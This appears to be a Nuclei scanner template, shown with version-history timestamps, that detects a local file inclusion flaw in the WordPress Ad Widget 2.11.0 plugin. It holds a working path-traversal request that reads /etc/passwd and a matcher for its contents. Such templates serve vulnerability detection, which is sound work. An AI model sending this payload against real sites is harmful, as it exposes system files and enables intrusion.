2021-11-05 18:36:13 +00:00
id : ad-widget-lfi
2021-11-04 22:46:27 +00:00
info :
2022-08-05 13:57:51 +00:00
name : WordPress Ad Widget 2.11.0 - Local File Inclusion
2021-11-04 22:46:27 +00:00
author : 0x_Akoko
severity : high
2022-08-10 08:48:06 +00:00
description : |
WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
2021-11-04 22:46:27 +00:00
reference :
- https://cxsecurity.com/issue/WLB-2017100084
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/caca21fe-56bf-4d4c-afc8-4a218e52f0a2
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : wordpress,wp-plugin,lfi,wp,adWidget,wpscan
2021-11-04 22:46:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-04 22:46:27 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022100a6e57567b938b024ef6ecb50f2d10b1e34d74980c2260ca01dc8f792b2b0b7f902203a17f4b62643d1387b94766910fe28a6e955a7e438f1335cd134bdf3151441d0:922c64590222798bb761d5b6d8e72950